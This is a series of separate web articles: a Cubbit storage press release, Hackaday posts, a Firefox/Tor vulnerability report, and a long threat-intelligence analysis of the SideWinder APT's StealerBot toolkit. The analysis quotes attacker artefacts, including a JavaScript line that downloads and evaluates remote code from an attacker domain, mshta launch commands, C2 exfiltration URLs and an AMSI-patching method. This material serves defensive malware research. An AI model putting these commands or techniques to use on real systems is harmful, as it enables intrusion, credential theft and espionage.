Nel corso degli anni, l’azienda ha preso in considerazione diverse soluzioni di archiviazione S3 in cloud e on-premise (in locale). Le prime erano di facile implementazione e gestione, ma non offrivano un livello di garanzia adeguato in termini di sicurezza, conformità alle normative sulla localizzazione dei dati e prevedibilità dei costi di banda (egress costs), di cancellazione e di replica dei bucket. Mentre le proposte di storage on-premise, invece, offrivano sovranità e conformità normativa, ma si rivelavano molto costose in termini di hardware, licenze, affitto o acquisto di locali fisici e personale IT dedicato all’implementazione, all’installazione e alla manutenzione della soluzione. Inoltre, optando per lo storage on-premise, la scalabilità della capacità di archiviazione doveva essere eseguita manualmente, gravando ulteriormente su costi e tempo. Pertanto, l’investimento per impostare manualmente la ridondanza su più sedi geografiche risultava maggiore con le altre soluzioni.

Con l’adozione della tecnologia di Cubbit, invece, Eurosystem SpA ha potuto beneficiare dei vantaggi dei servizi cloud tradizionali e delle soluzioni on-premise, mitigando al contempo le problematiche legate a queste due formule di archiviazione considerate separatamente. Cubbit DS3 presenta un costo fisso e unitario del servizio di storage che include tutte le principali API S3, insieme alla capacità di geo-distribuzione, fornendo una soluzione di cloud storage con una resilienza del dato (data durability) fino a 15 9. Grazie alla tecnologia geo-distribuita di Cubbit, Eurosystem SpA può proteggere i dati da minacce informatiche sia lato client (object lock, versioning, policy IAM), sia lato server (geo-distribuzione, crittografia).

Sfruttando la conformità al GDPR e le funzionalità di delimitazione geografica del dato di Cubbit, Eurosystem SpA è ora in grado di rispettare le normative regionali e le leggi più severe che impattano sui settori in cui operano i suoi clienti, consentendo al System Integrator di creare nuovi flussi di entrate — vantaggi che di solito sono associati alle soluzioni on-premise. Con l’implementazione della soluzione di Cubbit, la scalabilità della capacità di storage e la manutenzione vengono gestite automaticamente in pochi minuti, senza bisogno di investimenti iniziali o di personale IT dedicato.

Nicola Bosello, membro del Consiglio di Amministrazione e Sales Director di Eurosystem, dichiara: “Abbiamo cercato a lungo una soluzione di S3 storage definitiva e off-site che non comportasse la necessità di investire in un’infrastruttura costosa e complessa e che fosse conforme a requisiti chiave come il GDPR. Da un anno offriamo Cubbit ai nostri clienti, ricevendo un feedback positivo per le capacità di Cubbit di localizzazione del dato e di rimanere conforme alle normative, oltre che per la sua flessibilità, la velocità di implementazione, la facilità di scalabilità dello spazio di archiviazione in poche ore e il prezzo accessibile senza costi nascosti. Con Cubbit abbiamo già conquistato nuovi clienti e aumentato la fidelizzazione, incrementando significativamente il grado di cyber-resilienza del nostro portafoglio”.

Alessandro Cillario, Co-CEO e Co-fondatore di Cubbit, conclude: “Le aziende di tutto il mondo sono alle prese con l’ardua sfida di gestire la crescita esplosiva dei dati non strutturati. Hanno bisogno di una soluzione che si adatti alle loro policy interne e strategie IT, mantenendo il pieno controllo sui dati. Le organizzazioni europee, in particolare, devono affrontare una serie di sfide: dalle minacce informatiche ai problemi di sovranità dei dati, fino ai costi imprevedibili. Eurosystem, con Cubbit come vero e proprio player abilitatore, può ora offrire ai propri clienti un livello di resilienza informatica, sovranità ed efficienza dei costi mai raggiunto prima. Siamo entusiasti di avere Eurosystem come solido partner per promuovere le nostre soluzioni”.

L'articolo Cloud storage sicuro e geo-distribuito: Eurosystem sceglie Cubbit per un futuro resiliente proviene da il blog della sicurezza informatica.

More than a couple folks have written us saying that their entries into the Supercon Add-On Contest got caught up in the Chinese fall holidays. Add to that our tendency to wait until the last minute, and there still more projects out there that we’d like to see. So we’re extending the deadline one more week, until October 22nd.
AND!XOR Doom SAO from years past.
If you’re just tuning in now, well, you’ve got some catching up to do. Supercon Add-Ons are another step forward in the tradition of renaming the original SAO. One of our favorite resources on the subject comes from prolific SAO designer [Twinkle Twinkie], and you can even download PCB footprints over there on Hackaday.io.

Don’t know why you want to make an SAO? Even if you’re not coming to Supercon this year? Well, our own [Tom Nardi] describes it as a low barrier to entry, full-stack hardware design and production tutorial. Plus, you’ll have something to trade with like-minded hardware nerds at the next con you attend.

We’ve already seen some killer artistic entries, but we want to see yours! We know the time’s tight, but you can still get in a last minute board run if you get started today. And those of you who are sitting at home waiting for boards to arrive, wipe that sweat from your brow. We’ll catch up with you next Tuesday!

hackaday.com/2024/10/15/breaki…

There is no doubt that AI is rapidly reshaping the world of work. From suspiciously worded emails to new tools that integrate new AI-powered features, if you are a worker, there’s a high chance that you are already interacting with AI tools regularly.

euractiv.com/section/artificia…

Si è saputo che la vulnerabilità CVE-2024-9680 risolta la scorsa settimana in Firefox potrebbe essere utilizzata contro gli utenti del browser Tor.

Ricordiamo che il problema è stato scoperto dallo specialista ESET Damien Schaeffer ed era un problema use-after-free nelle timeline di animazione. Le sequenze temporali delle animazioni fanno parte dell’API Web Animations di Firefox e questo meccanismo è responsabile della gestione e della sincronizzazione delle animazioni tra le pagine Web.

Gli sviluppatori hanno rilasciato patch di emergenza e hanno avvertito che, grazie a questa vulnerabilità, un utente malintenzionato potrebbe eseguire codice arbitrario mentre lavora con i contenuti. All’epoca non erano state fornite informazioni dettagliate né sul bug stesso né sugli attacchi in cui è stato utilizzato.

Il problema è stato risolto nelle seguenti versioni del browser: Firefox 131.0.2, Firefox ESR 115.16.1 e Firefox ESR 128.3.1. Come ha affermato Mozilla, gli specialisti di ESET hanno fornito loro un exploit per il CVE-2024-9680, che è stato utilizzato dagli hacker in attacchi reali.

“L’esempio inviatoci da ESET conteneva una catena di exploit completa che consentiva l’esecuzione di codice remoto sul computer dell’utente”, scrivono gli sviluppatori. Mozilla ha riunito un team per decodificare l’exploit e capire come funziona, dopodiché ha preparato una patch di emergenza in un giorno. I rappresentanti dell’organizzazione sottolineano che continueranno ad analizzare l’exploit per sviluppare ulteriori misure di protezione per Firefox.

Quasi contemporaneamente, gli sviluppatori Tor hanno riferito che, secondo Mozilla, questa vulnerabilità è stata utilizzata attivamente negli attacchi contro gli utenti del browser Tor. “Sfruttando questa vulnerabilità, un utente malintenzionato potrebbe prendere il controllo del Tor Browser, ma molto probabilmente non sarebbe in grado di de-anonimizzare l’utente in Tails”, si legge nella dichiarazione.

Tuttavia, il post sul blog del progetto è stato successivamente modificato e il progetto Tor ha chiarito di non avere prove che gli utenti del browser Tor siano stati intenzionalmente presi di mira con CVE-2024-9680. Tuttavia, il bug ha colpito il Tor Browser, che è basato su Firefox, e gli sviluppatori sottolineano che il problema è stato risolto nelle versioni Tor Browser 13.5.7, 13.5.8 (per Android) e 14.0a9.

L'articolo Utenti TOR a Rischio! Il nuovo Exploit di Mozilla Firefox può mettere a rischio l’Anonimato proviene da il blog della sicurezza informatica.

Embedded programming is a tricky task that looks straightforward to the uninitiated, but those with a few decades of experience know differently. Getting what you want to work predictably or even fit into the target can be challenging. When you get to a certain level of complexity, breaking code down into multiple tasks can become necessary, and then most of us will reach for a real-time operating system (RTOS), and the real fun begins. [Aleksei Tertychnyi] clearly understands such issues but instead came up with an alternative they call ANTIRTOS.

The idea behind the project is not to use an RTOS at all but to manage tasks deterministically by utilizing multiple queues of function pointers. The work results in an ultra-lightweight task management library targeting embedded platforms, whether Arduino-based or otherwise. It’s pure C++, so it generally doesn’t matter. The emphasis is on rapid interrupt response, which is, we know, critical to a good embedded design. Implemented as a single header file that is less than 350 lines long, it is not hard to understand (provided you know C++ templates!) and easy to extend to add needed features as they arise. A small code base also makes debugging easier. A vital point of the project is the management of delay routines. Instead of a plain delay(), you write a custom version that executes your short execution task queue, so no time is wasted. Of course, you have to plan how the tasks are grouped and scheduled and all the data flow issues, but that’s all the stuff you’d be doing anyway.

The GitHub project page has some clear examples and is the place to grab that header file to try it yourself. When you really need an RTOS, you have a lot of choices, mostly costing money, but here’s our guide to two popular open source projects: FreeRTOS and ChibiOS. Sometimes, an RTOS isn’t enough, so we design our own full OS from scratch — sort of.

hackaday.com/2024/10/15/antirt…

SideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was first publicly mentioned by us in 2018. Over the years, the group has launched attacks against high-profile entities in South and Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.

Over the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively described in various analyses and reports published by different researchers and vendors (for example, here, here and here), the latest of which was released at the end of July 2024. The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.

Despite years of observation and study, knowledge of their post-compromise activities remains limited.

During our investigation, we observed new waves of attacks that showed a significant expansion of the group’s activities. The attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also discovered a previously unknown post-exploitation toolkit called “StealerBot”, an advanced modular implant designed specifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on targets of interest.

SideWinder’s most recent campaign schema

Infection vectors

The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file starts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the StealerBot espionage tool.

The documents often contain information obtained from public websites, which is used to lure the victim into opening the file and believing it to be legitimate. For example, the file in the image contains data downloaded from the following URL: nasc.org.np/news/closing-cerem…

Snippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation (NOC).docx”

The contents of the file are selected specifically for the target and changed depending on the target’s country.

All the documents use the remote template injection technique to download an RTF file that is stored on a remote server controlled by the attacker.

RTF exploit

RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in Microsoft Office software.

The attacker embedded shellcode designed to execute JavaScript code using the “RunHTMLApplication” function available in the “mshtml.dll” Windows library.

The shellcode uses different tricks to avoid sandboxes and complicate analysis.

• It uses GlobalMemoryStatusEx to determine the size of RAM memory. If the size is less than 2GB, it terminates execution.
• It uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or AMD, it terminates execution.
• It attempts to load the “dotnetlogger32.dll” library. If the file is present on the system, it terminates execution.

The malware uses different strings to load libraries and functions required for execution. These strings are truncated and the missing part is added at runtime by patching the bytes. The strings are also mixed inside the code, which is adapted to skip them and jump to valid instructions during execution, to make analysis more difficult.

The strings are passed as arguments to a function that performs the same action as “GetProcAddress”: it gets the address of an exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the name of the exported function.

The first argument is passed with the standard push instruction, which loads the library address to the stack. The second argument is passed indirectly using a CALL instruction.

Passing necessary arguments

The loaded functions are then used to perform the following actions:

1. Load the “mshtml.dll” library and get the pointer to the “RunHTMLApplication” function.
2. Get a pointer to the current command line using the “GetCommandLineW” function.
3. Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using “0x12” as the key.
4. Overwrite the current process command line with the decoded JavaScript.
5. Call the “RunHTMLApplication” function, which will execute the code specified in the process command line.

The loaded JavaScript downloads and executes additional script code from a remote website.
javascript:eval("v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\",
\"hxxps://mofa-gov-
sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")

Initial infection LNK

During the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file attached. The ZIP archive is distributed with names intended to trick the victim into opening the file. The attacker frequently uses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.

The archive usually contains an LNK file with the same name as the archive. For example:

The LNK file points to the “mshta.exe” utility, which is used to execute JavaScript code hosted on a malicious website controlled by the attacker.

Below are the configuration values extracted from one of these LNK files:
Local Base Path : C:\Windows\System32\sshtw.png
Description : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx
Relative Path : ..\..\..\Windows\System32\calca.exe
Link Target: C:\Windows\System32\mshta.exe
Working Directory : C:\Windows\System32
Command Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0"
Icon File Name : %systemroot%\System32\moricons.dll
Machine ID : desktop-84bs21b

Downloader module

The RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is stored as a base64-encoded string. The payload is a .NET library named “App.dll”, which is then invoked by the script.

JavaScript loader (beautified)

App.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an argument by the JavaScript, or to decode and execute another payload passed as an argument.

The library should be executed by invoking the “Programs.Work()” method, which can receive three arguments as input. We named the inputs as follows:

App.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions are of interest to the malware. The collected data are sent to the C2. Then, if the “Payload_data” argument is not “Null”, it decodes and decompresses the data using base64 and Gzip. The resulting payload is stored in the user’s Temp directory using the filename specified in the “Payload_filename” argument.

If Avast or AVG solutions are installed, the content of the dropped file is executed with the following command:
mshta.exe "javascript:WshShell = new
ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1,
false);window.close()
Otherwise, it will be executed with the following command:
pcalua.exe -a %TEMP%\%Payload_filename%
If the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The obtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.

The resulting file should be .NET malware named “ModuleInstaller.dll”.

ModuleInstaller

The ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised machines, a malicious component we dubbed “Backdoor loader module”. We have been observing this specific component since 2020, but previously we only described it in our private intelligence reports.

ModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious library, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional modules, a malicious library, and an encrypted payload. We observed various combinations of the dropped files, the most common being:
%Malware Directory%\vssvc.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\vsstrace.dll
%Malware Directory%\vssvc.exe.config
or
%Malware Directory%\WorkFolders.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\propsys.dll
%Malware Directory%\WorkFolders.exe.config
ModuleInstaller embeds the following resources:

The downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The retrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security solutions:

ModuleInstaller supports six infection routines, which differ in the techniques used to execute “Backdoor loader module” or download the components, but share similarities in the main logic. Some of these routines also include tricks to remove evidence, while others don’t. The malware only runs one specific routine chosen according to the value received as an argument and the value of an internal configuration embedded in the code.

All the routines collect information about the compromised system. Specifically, they collect:

• Current username;
• Processor names and number of cores;
• Physical disk name and size;
• The values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;
• Current hostname;
• Local IP address;
• Installed OS;
• Architecture.

The collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable named “data”.
hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo>
The malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet:
C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download
C2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download
C2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download
C2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download
The malware sends the collected information to one of the C2 servers selected according to the specific infection routine. The server response should be a payload with various configuration values.

The set of values may vary depending on the infection routine. The malware parses the received values and assigns them to local variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular infection routine the attacker used debug strings that allowed us to obtain most of these names. The table below contains the full list of possible configuration values.

The payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.

During execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample used C2_URL_4 for this purpose. The request includes at least one variable named “data”, whose value indicates the infection status.

The technique used to maintain persistence varies according to the infection routine selected by the malware, but generally relies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.

For example:
RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RegValue: xcschemer (MALWARE_DIRECTORY)
RegValueData: %AppData%\xcschemer\vssvc.exe (HIJACK_EXE_PATH)

Backdoor loader module

The infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded using the legitimate and digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped by ModuleInstaller, decrypts it and loads it in memory.

The Backdoor loader module has been observed since 2020, we covered it in our private APT reports. It has remained almost the same over the years. It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, and the latest variants were designed to enumerate all the files in the current directory and load those without an extension.

The library is usually highly obfuscated using the Control Flow Flattening technique. In addition, the strings, method names, and resource names are randomly modified with long strings, which makes the decoded code difficult to analyze. Moreover, some relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple DES.

The malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100 seconds. Sandboxes usually ignore the sleeping functions because they are often used by malware to generate long delays in execution and avoid detection. Upon awakening, the malware retrieves again the current time and date and checks if the elapsed time is less than 90.5 seconds. If the condition is true, it terminates the execution.

The malware also attempts to avoid detection by patching the AmsiScanBuffer function in “amsi.dll” (Windows Antimalware Scan Interface). Specifically, it loads the “amsi.dll” library and parses the export directory to find the “AmsiScanBuffer” function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D to always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi” protection to always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.

AmsiScanBuffer before patching

AmsiScanBuffer after patching

The patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero) instruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as input to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.

After patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another payload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character ‘.’ in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file as the key and decodes the rest of the data using the XOR algorithm. Finally, it loads the data as a .NET assembly and invokes the “Program.ctor” method.

StealerBot

StealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module. Prior to being loaded, the binary is stored in an encrypted file.

The implant consists of different modules loaded by the main “Orchestrator”, which is responsible for communicating with the C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded on compromised victims and were used to:

• Install additional malware;
• Capture screenshots;
• Log keystrokes;
• Steal passwords from browsers;
• Intercept RDP credentials;
• Steal files;
• Start reverse shell;
• Phish Windows credentials;
• Escalate privileges bypassing UAC.

Module IDs are included both in modules and in an encrypted configuration file. The Orchestrator uses them to manage the components. It shares messages/commands with the modules, and can handle specific messages to kill or remove modules with a particular ID.

StealerBot Orchestrator

The Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server, and executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker and upload files with stolen information. It also exchanges messages with the loaded module that can be used to provide or modify configuration properties and unload specific components from the memory.

Once loaded into memory, the malware decodes a resource embedded in the Orchestrator called “Default”. The resource contains a configuration file with the following structure:

The configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the malware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2 server.

After parsing the configuration, the malware loads all the modules specified in the file. It then launches two threads to communicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed “C2 Modules”, which is used to obtain new modules. The second thread is used to communicate with the URL we called “C2 Gateway”, which is used to upload the data generated by the modules.

The malware communicates with the C2 Modules server using GET requests. Before sending the request, it adds an “x” value that contains the list of modules already loaded by the agent.
&x[moduleId_1,moduleId_2,moduleId_3,etc.]"
The server responds with a message composed of two parts, the header and the payload. Each part has a specific structure with different information:

Message structure

Each message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in the “rgbSignature” value. The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify that the provided digital signature is valid.

The header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is compressed using Gzip and encrypted using AES. The header contains the information needed to identify the module, decrypt the payload, and verify the received data.

When the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a pipe handle. The pipe is used to maintain communication between the module and the Orchestrator.

The modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and terminate module execution. The messages function like commands, have a specific ID, and can include arguments.

The first byte of the message is its ID, which defines the request type:

Modules

Keylogger

This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes, mouse events, Windows clipboard contents, and the title of the currently active window.

Screenshot Grabber

This module periodically grabs screenshots of the primary screen.

File Stealer

The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions. By default, the list of extensions is as follows:
.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf
Based on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that usually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the extension of files created by PuTTY to store private keys. PuTTY is an SSH and Telnet client commonly used on Windows OS to access remote systems.

The stolen data also includes information about the local drive and file attributes.

Snippet of code with the list of information collected by the File Stealer module

Live Console

This library is configured to execute arbitrary commands on the compromised system. It can be used as a passive backdoor, listening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands. The library can also process custom commands that provide the following capabilities:

• Kill the module itself or its child processes;
• Download additional files to compromised systems;
• Add Windows Defender exclusions;
• Infect other users on the local system (requires high privileges);
• Download and execute remote HTML applications;
• Load arbitrary modules and extend malware capabilities.

Unlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module’s code. By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.

If the infected OS is recent, i.e., Windows 10 build version greater than or equal to “17763”, the malware creates a pseudoconsole to launch “cmd.exe”. Otherwise, it launches the same application using the “Process” class specified in “System.Diagnostics”.

Before forwarding the command to the console, the malware checks if the first byte of the received data has a specific value that indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the commands they identify.

Most of the commands are self-explanatory. We’d like to add a few words on the command with ID “1”, which is used to infect other users on the same system whose profile is still “clean”. The malware infects the user by creating a copy of the samples in the target user’s directory and creates a new registry value to ensure persistence.

This command is interesting because in the case of a specific error, the bot replies with the following message:
Infected User is already logged in, use install dynx command from stealer bot
for installation
Currently, we don’t know what the dynx command represents, but the name “stealer bot” in this message and the name of the resource embedded in the “ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the attacker named this malware StealerBot.

RDP Credential Stealer

This module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes and injects malicious code into “mstsc.exe” to steal RDP credentials.

mstsc.exe GUI

Mstsc.exe is the “Microsoft Terminal Service Client” process, which is the default RDP client on Windows. The malware monitors the creation or termination of processes with the name “mstsc.exe”. When a new creation event is detected the malware creates a new pipe with the static name “c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into the new process memory.

The injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at runtime according to the system architecture, and merged before injection. The injected code is a shellcode that loads another malicious library called “mscorlib”, written in C++ to steal RDP credentials by hooking specific functions of the Windows library “SspiCli.dll”. The library code appears to be based on open-source projects available on GitHub. It uses the Microsoft Detours Package to add or remove the hooks to the following functions:

• SspiPrepareForCredRead;
• CryptProtectMemory;
• CredIsMarshaledCredentialW.

The three functions are hooked to obtain the server name, password, and username, respectively. The stolen data are sent to the main module using the previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.

Token Grabber

The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading additional legitimate and signed libraries whose functions it uses. These libraries are not present on the compromised system by default, so the malware has to drop and load them to function properly.

Credential Phisher

This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.

Phishing prompt

Similar to the RDP Credential Stealer, the malware creates a new pipe (“a21hg56ue2c2365cba1g9840256ad31c”) and injects malicious shellcode into a targeted process, in this case “explorer.exe”. The shellcode loads a malicious library called “credsphisher.dll”, which uses the Windows function “CredUIPromptForWindowsCredentialsW” to display a phishing prompt to current users and trick victims into entering their Windows credentials.

When the user enters the credentials, the malware uses the “LogonUserW” function to check that the username and password provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it receives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname, username and password to a previously created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.

UACBypass

This module is a .NET library designed to bypass UAC and run malicious code with high privileges.

The library can achieve its goal using different bypass techniques, selected according to the Windows version and the security solution installed on the infected machine. The malware embeds various resources containing different payloads used during malware execution.

Before starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn’t require admin credentials and that the infected user belongs to the ‘Administrator’ group. If both conditions are met, the malware checks the Windows version and drops some artifacts according to the obtained values.

The main goal of this component is to execute the resource named “Module”, which is a downloader, with high privileges. The malware tries to use different UAC bypass techniques, which are selected according to the installed security solution. By default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program is abused with a technique discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands with high privilege. The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total Security.

If these security solutions are detected, the malware attempts to use a more recent UAC bypass technique discovered in 2022, which abuses the “IElevatedFactoryServer” COM object.

In this case, the malware injects malicious shellcode into “explorer.exe”. The shellcode loads and executes a malicious library that was stored in the resource named “COMUacBypass”. The library uses the “IElevatedFactoryServer” COM object to register a new Windows task with the highest privileges, allowing the attacker to execute the command to run the dropped payload with elevated privileges.

During the static analysis of the “UACBypass” module we noticed the presence of code that is not called or executed. Specifically, we noticed a method named “KasperskyUACBypass” that implements another bypass technique that was probably used in the past when the system was protected by Kaspersky anti-malware software. The method implements a bypass technique that abuses the legitimate Windows program slui.exe. It is used to activate and register the operating system with a valid product key, but is prone to a file handler hijacking weakness. The hijacking technique was described in 2020 and is based on the modification of specific Windows registry keys. Based on the created values, we believe the attacker based their code on a proof of concept available on GitHub.

The module still includes two resources that are used exclusively by this code:
VmComputeAgent
VmComputeAgent_exe
The first is a very simple program, packed with ConfuserEx, which starts a new process: “%systemroot%\System32\slui.exe” as administrator.

The second is an XML manifest.

Downloader

The library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs.
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr
Unfortunately, we were not able to get a valid response from the server, but considering the “name” variable inside the URL and the logic of the various components observed during the investigation, we can infer that each “name” value probably also indicates the real purpose of the file.

The downloaded data are combined into a final payload with the following structure:
stg64 + <size of rlfr+inpl64+8> + rlfr + <delimiter> + inpl64
Finally, the malware loads the payload into memory and executes it. The execution method is selected according to the version of Windows.

On systems prior to Windows 10, the malware allocates a memory region with read, write and execution permissions, copies the previously generated payload to the new region, and directly calls the first address.

On newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the “.data” section to the final payload.

The malware then patches the kernel32 image in memory and hooks the “LoadLibraryA” function to redirect the execution flow to the small shellcode copied in the allocated region.

Finally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.

Snippet of reversed code used to hook LoadLibrary and run the payload

The small shellcode compares the first 8 bytes of the received argument with the static string “aepic.dl”, and if the bytes match, it jumps to the downloaded shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.

Shellcode embedded in the downloader image

Installers

During the investigation we found two more components, which are installers used to deploy the StealerBot on the systems. We didn’t observe them during the infection chain. They are probably used to install new versions of the malware or deploy the malware in different contexts on the same machine. For example, to infect another user.

InstallerPayload

The first component is a library developed in C++ that acts as a loader. The code is very similar to the “Downloader” component observed in the UAC bypass module. The library contains different payloads that are joined together at runtime and injected into the remote “spoolsv.exe” process.

The injected payload reflectively loads a library called “InstallerPayload.dll”, written in C++, to download additional components and maintain their persistence by creating a new Windows service.

The malware is configured to download the files from a predefined URL using WinHTTP.
hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E
F0mo673/1/1706084656128/x3l8o/2c821e
The specific file to be downloaded is requested with a variable “name”, which is included in all GET requests. Each file is downloaded to a specific location:

The specific filename changes according to the Windows version.

If the Windows build is lower than 10240 (Windows 10 build 10240), the malware installs the following files:

• %systemroot%\srclinks\write.exe
• %systemroot%\srclinks\propsys.dll
• %systemroot%\srclinks\write.exe.config
• %systemroot%\srclinks\vm3dservice.exe
• %systemroot%\srclinks\winmm.dll

Otherwise:

• %systemroot%\srclinks\fsquirt.exe
• %systemroot%\srclinks\devobj.dll
• %systemroot%\srclinks\fsquirt.exe.config
• %systemroot%\srclinks\vm3dservice.exe
• %systemroot%\srclinks\winmm.dll

The malware also creates a new Windows service named
"srclink" to ensure that the downloaded files can start automatically when the system restarts.
The service is configured to start automatically and run the following program:
C:\WINDOWS\srclinks\vm3dservice.exe
The file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious
"winmm.dll" library.
This is a library developed in C++ and named
"SyncBotServiceHijack.dll" that exports all the functions normally exported by the legitimate “winmm.dll” library located in the system32 directory.
All the functions point to a function that sleeps for 10 seconds and then raises a signal error and terminates execution.

Instructions used to raise an error

This is part of the persistence mechanism created by the attacker. The malicious Windows service created by the InstallerPayload component is configured to launch another program if the service fails.

Windows service properties

We may presume that the attacker uses this trick to bypass detection and sandbox technologies.

In this case, the service starts another program previously dropped by the malware:
%systemroot%\srclinks\fsquirt.exe
